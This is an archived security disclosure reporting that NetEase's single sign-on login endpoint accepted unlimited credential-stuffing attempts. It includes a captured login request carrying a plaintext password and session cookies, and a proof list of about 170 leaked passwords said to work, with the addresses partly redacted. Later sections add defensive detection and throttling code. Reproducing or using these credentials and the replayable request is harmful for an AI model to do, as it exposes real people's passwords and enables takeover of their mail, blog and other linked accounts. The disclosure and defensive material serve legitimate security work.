
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0112024

Title: Credential stuffing against an important NetEase interface leaks user login credentials (with a batch of accounts as proof)

Vendor: 网易 (NetEase)

Author: 路人甲

Submitted: 2015-05-04 19:30

Fix time: 2015-05-05 10:56

Published: 2015-05-05 10:56

Type: Design flaw / logic error

Severity: High

Self-rated Rank: 18

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-04: Details sent to the vendor, awaiting vendor handling
2015-05-05: Vendor actively ignored the vulnerability; details disclosed to the public

Summary:

Credential stuffing (撞库) and account scanning are already listed among the Top 10 Security Risks for 2014. Credential stuffing starts from a large corpus of leaked user data and exploits the habit of registering with the same username and password everywhere: leaked pairs are simply tried against other sites. The 2011 wave of Internet leaks shook the whole information-security field and showed that plain username+password authentication no longer meets today's security needs. The leaked sets included Tianya: 31,758,468 records; CSDN: 6,428,559; Weibo: 4,442,915; Renren: 4,445,047; Mop: 2,644,726; 178: 9,072,819; Duduniu: 13,891,418; 7K7K: 18,282,404; the report puts the total at 120 million (the eight sets listed here sum to roughly 91 million). However well your own site protects its passwords, defending the login path against already-leaked username/password pairs remains an essential control.

Detailed description:

The main-site login endpoint has no defense against credential stuffing: calls to it are not rate-limited or otherwise restricted. Testing showed that replaying a leaked credential database against it matches a large number of valid accounts. Because NetEase accounts are single sign-on, each matched pair also grants access to every associated service: Weibo, blog, mailbox and so on. The captured login request:

POST /logins.jsp HTTP/1.1
Host: reg.163.com
Connection: close
Content-Length: 230
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.163.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.163.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: usertrack=c+5+hVVAxQLBxR9jBeWgAg==; _ntes_nnid=4fc0b7199a1c9834e05c0d696f1cb9ea,1430308107352; SID=a8ff61f3-e067-46cd-9c83-0b8f7d314f9a; _ntes_nuid=4fc0b7199a1c9834e05c0d696f1cb9ea; Province=0571; City=0571; vjuids=eb751fe52.14d05bd1d69.0.e1a6c9db; JSESSIONID=dacaeQeXDF-5IbyK9xi0u; T_INFO=CE1F7243882AAA0FEBB261E71A3B9FA41F903565B4C9497BE810CD4E3FDFD8878098BA0EB3F9DE7E303573B8C0BB5B31EF33BC42C912FF0C2D77EE9BB51D0928; [email protected]%261%261%260%[email protected]%261%261%260%7C; URS_Analyze=1; ne_analysis_trace_id=1430728079918; pver_n_f_l_n3=a; n_ht_s=1; [email protected]|1430721918|2|urs|10&15|not_found&1430721790&163#zhj&330100#0#0#0|151519&0|163&urs|[email protected]; vjlast=1430320389.1430728080.13; vinfo_n_f_l_n3=efd1f43a14527912.1.0.1430320389504.0.1430728196488; s_n_f_l_n3=efd1f43a145279121430320389505
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
username=570138905@qq%2ecom&password=wxl5927101&type=1&product=163&savelogin=0&url=http%3A%2F%2Fwww.163.com%2Fspecial%2F0077450P%2Flogin_frame.html&url2=http%3A%2F%2Fwww.163.com%2Fspecial%2F0077450P%2Flogin_frame.html&noRedirect=1
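The capture above is the request a stuffing tool replays; what the defender sees is the resulting pattern in the login endpoint's logs. The following is an added example, not code from the report or from NetEase: it parses a constructed log (the line format, the IP addresses and the thresholds are assumptions) and separates a credential-stuffing source, which spreads mostly-failing attempts over many distinct usernames, from a single-account brute force and from an ordinary user who mistypes a password.

```python
"""Spot credential stuffing in login-endpoint logs.

Added example, not code from the WooYun report or from NetEase. The log line
format, the IP addresses and the thresholds are assumptions; the sample log is
constructed, not captured data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp> ip=<addr> user=<login> result=OK|FAIL"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d) ip=(?P<ip>\S+) "
    r"user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def build_sample_log():
    """Constructed log with three sources: a stuffing bot, a brute-forcer and a real user."""
    t0 = datetime(2015, 5, 4, 14, 40, 0)
    lines = []
    # 203.0.113.7 replays a leaked list: 30 distinct accounts, 5 s apart, 3 of them still valid.
    for i in range(30):
        ts = t0 + timedelta(seconds=5 * i)
        result = "OK" if i in (4, 17, 26) else "FAIL"
        lines.append(f"{ts.isoformat()} ip=203.0.113.7 user=user{i:03d}@example.com result={result}")
    # 192.0.2.44 guesses passwords for one account: 25 attempts, 3 s apart, all fail.
    for i in range(25):
        ts = t0 + timedelta(seconds=3 * i)
        lines.append(f"{ts.isoformat()} ip=192.0.2.44 user=victim@example.com result=FAIL")
    # 198.51.100.9 is a person who mistypes twice and then gets in.
    for i, result in enumerate(("FAIL", "FAIL", "OK")):
        ts = t0 + timedelta(seconds=20 * i)
        lines.append(f"{ts.isoformat()} ip=198.51.100.9 user=alice@example.com result={result}")
    return "\n".join(lines)


def parse_log(text):
    """Parse lines into (timestamp, ip, user, success) tuples, oldest first; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["result"] == "OK"))
    return sorted(events)


def classify_sources(events, window=timedelta(minutes=5), min_attempts=20,
                     min_users=10, min_fail_ratio=0.8):
    """Map each source IP to 'stuffing', 'brute_force' or None.

    For every sliding window of length `window` over one IP's attempts:
      - at least min_attempts attempts, mostly failing, spread over at least
        min_users distinct usernames  -> 'stuffing' (a leaked list being replayed;
        the few OK results are exactly the hits the report is about)
      - the same volume and failure rate on fewer usernames -> 'brute_force'
    Low-volume or mostly-successful traffic is left unflagged.
    """
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))

    verdicts = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        verdict = None
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            chunk = attempts[start:end + 1]
            if len(chunk) < min_attempts:
                continue
            failures = sum(1 for _, _, ok in chunk if not ok)
            if failures / len(chunk) < min_fail_ratio:
                continue
            distinct_users = len({user for _, user, _ in chunk})
            if distinct_users >= min_users:
                verdict = "stuffing"
                break
            verdict = "brute_force"
        verdicts[ip] = verdict
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_sources(parse_log(build_sample_log())).items():
        print(f"{ip:15} {verdict}")
```

The distinguishing signal is the number of distinct usernames per source, not the failure rate alone: a brute force and a stuffing run both fail most of the time, but only the stuffing run touches a new account on nearly every request, and a handful of OK results inside that pattern are leaked credentials that still work.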

Proof of concept:

Testing showed that replaying a leaked credential database against the endpoint yields a large number of valid login accounts. The pairs below authenticated successfully (the e-mail addresses appear redacted in this archived copy):

[email protected] lhm32411111
[email protected] jun13788578250
[email protected] njzhu045
[email protected] jjzj334553086
[email protected] wn1000015218
[email protected] d3y47tjimmyzeng
[email protected] hewotiaowuba
[email protected] 4034lj
[email protected] 13990844111
[email protected] wxl5927101
[email protected] Allen0112
[email protected] 11556688
[email protected] n19880308n
[email protected] 53286566
[email protected] lzb3227521
[email protected] 198552200
[email protected] 159357qtoetu
[email protected] XRKSHI11
[email protected] jay998849888
[email protected] xujiqiang
[email protected] ilovewen99@
[email protected] qqq3394724
[email protected] ailing123
[email protected] 19811103
[email protected] hy1976109
[email protected] 19870925
[email protected] 08327656314
[email protected] zl191215
[email protected] w270811c
[email protected] 04151403
[email protected] 13309492097
[email protected] tjq19880219
[email protected] fox165910
[email protected] 85282465
[email protected] zy840614
[email protected] 19900419
[email protected] 19780917
[email protected] 123456789
[email protected] 19831210
[email protected] cheng911
[email protected] 123yiyaa
[email protected] 200853275214
[email protected] zzp19900919
[email protected] hjjzsf
[email protected] jingjing
[email protected] 881129sjj
[email protected] 2119861020
[email protected] 2007198817
[email protected] 513148977
[email protected] xiaozhu1117
[email protected] 5731381431
[email protected] lang__1984
[email protected] 36991019s
[email protected] shallin
[email protected] kent123456
[email protected] wdqq19870618
[email protected] woaimama
[email protected] 55036081
[email protected] niaiwoma
[email protected] 88995234
[email protected] Jay261012
[email protected] 24248423
[email protected] hj8229651
[email protected] z19891110
[email protected] feng_1321
[email protected] wxy3844989
[email protected] becky362329
[email protected] LWZL139791
[email protected] 85651051
[email protected] 6967446sky
[email protected] laure9797
[email protected] a34416912
[email protected] lw198718
[email protected] y2212886
[email protected] pa87722857
[email protected] kaaiqkwmmo
[email protected] 68728883
[email protected] !qazxsw@
[email protected] 46731007
[email protected] 19761102
[email protected] QJJ0325521140
[email protected] 79532448
[email protected] 466427048
[email protected] 671223
[email protected] fengyu0515
[email protected] aiwind1314
[email protected] 19880623
[email protected] 82250755
[email protected] microlab
[email protected] 1325747445
[email protected] q514082801
[email protected] icc1234567
[email protected] wanghao110
[email protected] 813813813
[email protected] 1030238333
[email protected] 124592203
[email protected] a3142895
[email protected] ma2312251
[email protected] passwordkm
[email protected] 30214401
[email protected] 26362511
[email protected] zw8112151
[email protected] 123456as
[email protected] 13580617139
[email protected] sha543DAN521
[email protected] 305185564
[email protected] llg679865
[email protected] chuanqicn
[email protected] greed4123
[email protected] senaiqian
[email protected] 63506729
[email protected] woainimabi
[email protected] 19870424
[email protected] liuxiao1991
[email protected] nibiaoma
[email protected] 820834502
[email protected] gaoli123
[email protected] kele0628
[email protected] 74185288
[email protected] hsb123569
[email protected] 73366227
[email protected] 520bafndx
[email protected] huayinqiu13579
[email protected] 19850821
[email protected] king2000
[email protected] ossjzlzl
[email protected] zzw034012
[email protected] 4615182520
[email protected] woaidudu
[email protected] lht237lht
[email protected] 1989527918911
[email protected] 58929176
[email protected] 0515-8106236
[email protected] 07307635920
[email protected] 123327854
[email protected] fanchiqiang
[email protected] huyin2915610
[email protected] XMYXZ197807
[email protected] 820719123
[email protected] t123a456y
[email protected] 1695174717
[email protected] luo198706
[email protected] 19820425
[email protected] 65580321
[email protected] 7258725899
[email protected] sth198557
[email protected] thughero
[email protected] senling52
[email protected] 830814guan
[email protected] jkjkjk2009
[email protected] 19840110
[email protected] y90139529
[email protected] arsenal0577
[email protected] lordwolf
[email protected] ly86710467
[email protected] 919293729
[email protected] qushuliang0426
[email protected] kaizhang
[email protected] 07178682
[email protected] gaoermao
[email protected] yzhao888
[email protected] sy12345678
[email protected] 1363916038
[email protected] 13432438925


[Screenshot: 屏幕快照 2015-05-04 下午2.46.08.png]

[Screenshot: 屏幕快照 2015-05-04 下午2.43.04.png]

[Screenshot: 屏幕快照 2015-05-04 下午2.40.21.png]


Fix recommendation:

Credential stuffing defense reference: http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/
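The link above is the reporter's pointer to defenses. The following is an added example of the kind of throttle the finding calls for; it is not NetEase's code and not the linked article's design. It keeps two independent sliding windows of failed attempts, one per source IP and one per account, and escalates from ALLOW to CHALLENGE (a captcha or second factor) to BLOCK. The account window is what catches a distributed attack that keeps every IP under the per-IP limit. The thresholds, the 600 s window and the in-memory store are assumptions; a real deployment shares the counters across all login servers.

```python
"""Throttle a login endpoint against credential stuffing.

Added example, not NetEase's code and not the design of the reference linked
above. Thresholds, the 600 s window and the in-memory store are assumptions;
a production deployment keeps these counters in a store shared by all login
servers so that a distributed attack is seen as a whole.
"""
from collections import defaultdict, deque


class LoginThrottle:
    """Per attempt, return ALLOW, CHALLENGE (captcha / second factor) or BLOCK.

    Two independent sliding windows of *failed* attempts:
      - per source IP:  one host replaying a leaked list trips this quickly
      - per account:    an attack spread over many IPs, each staying under the
                        IP limit, still accumulates failures on the target account
    Successes are not counted, so a normal user is never penalised for logging in.
    """

    def __init__(self, window=600.0, ip_challenge=5, ip_block=50,
                 acct_challenge=3, acct_block=10):
        self.window = window
        self.ip_challenge, self.ip_block = ip_challenge, ip_block
        self.acct_challenge, self.acct_block = acct_challenge, acct_block
        self._ip_fail = defaultdict(deque)    # ip -> timestamps of failed attempts
        self._acct_fail = defaultdict(deque)  # account -> timestamps of failed attempts

    def _live_count(self, dq, now):
        """Drop timestamps older than the window and return how many remain."""
        while dq and now - dq[0] > self.window:
            dq.popleft()
        return len(dq)

    def check(self, ip, account, now):
        """Call before verifying the password."""
        ip_n = self._live_count(self._ip_fail[ip], now)
        acct_n = self._live_count(self._acct_fail[account], now)
        if ip_n >= self.ip_block or acct_n >= self.acct_block:
            return "BLOCK"
        if ip_n >= self.ip_challenge or acct_n >= self.acct_challenge:
            return "CHALLENGE"
        return "ALLOW"

    def record(self, ip, account, now, success):
        """Call after verifying the password (an unsolved challenge counts as a failure).

        A success clears the account's window only: the IP may still be stuffing
        other accounts, and the report's point is that some replayed pairs do succeed.
        """
        if success:
            self._acct_fail[account].clear()
        else:
            self._ip_fail[ip].append(now)
            self._acct_fail[account].append(now)


def simulate_stuffing(throttle, ip, n_accounts, interval=1.0):
    """Replay a constructed leaked list of n_accounts distinct usernames from one IP.

    Returns how many attempts got each decision. Every pair is assumed to fail here;
    a blocked attempt never reaches password verification, so it is not recorded.
    """
    counts = {"ALLOW": 0, "CHALLENGE": 0, "BLOCK": 0}
    for i in range(n_accounts):
        now = i * interval
        account = f"user{i:04d}@example.com"
        decision = throttle.check(ip, account, now)
        counts[decision] += 1
        if decision != "BLOCK":
            throttle.record(ip, account, now, success=False)
    return counts


def simulate_distributed(throttle, account, n_ips, interval=1.0):
    """Hit one account once from each of n_ips addresses; only the account window can trip."""
    counts = {"ALLOW": 0, "CHALLENGE": 0, "BLOCK": 0}
    for i in range(n_ips):
        now = i * interval
        ip = f"10.0.{i // 250}.{i % 250 + 1}"  # constructed attacker addresses
        decision = throttle.check(ip, account, now)
        counts[decision] += 1
        if decision != "BLOCK":
            throttle.record(ip, account, now, success=False)
    return counts


def simulate_legit_user(throttle, ip, account):
    """A person mistypes twice and then succeeds; both windows stay under the challenge thresholds."""
    decisions = []
    for i, success in enumerate((False, False, True)):
        decisions.append(throttle.check(ip, account, float(i)))
        throttle.record(ip, account, float(i), success)
    return decisions


if __name__ == "__main__":
    print(simulate_stuffing(LoginThrottle(), "203.0.113.7", 100))
    print(simulate_distributed(LoginThrottle(), "victim@example.com", 20))
    print(simulate_legit_user(LoginThrottle(), "198.51.100.9", "alice@example.com"))
```

Counting only failures keeps the throttle invisible to real users, while the per-account window means that spreading a list over a botnet buys the attacker nothing once a target account has absorbed a few failures. The challenge tier, rather than an outright block, is what keeps an attacker from locking legitimate users out of their own accounts on purpose.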

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact (vendor ignored)

Ignored at: 2015-05-05 10:56

Vendor reply:

Thank you for your attention to NetEase!

Latest status:

None yet